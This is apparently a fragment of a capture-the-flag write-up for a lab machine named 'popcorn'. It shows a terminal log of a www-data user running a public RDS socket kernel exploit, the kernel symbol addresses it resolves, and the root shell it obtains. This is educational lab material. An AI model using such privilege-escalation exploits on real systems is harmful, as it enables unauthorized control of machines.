6 privesc_2 rds
# Using https://github.com/lucyoa/kernel-exploits/tree/master/rds
www-data@popcorn:/tmp/k$ chmod +x rds
www-data@popcorn:/tmp/k$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc089b908
[+] Resolved default_security_ops to 0xc075e2a0
[+] Resolved cap_ptrace_traceme to 0xc02caf30
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami;id
root
uid=0(root) gid=0(root)
Last updated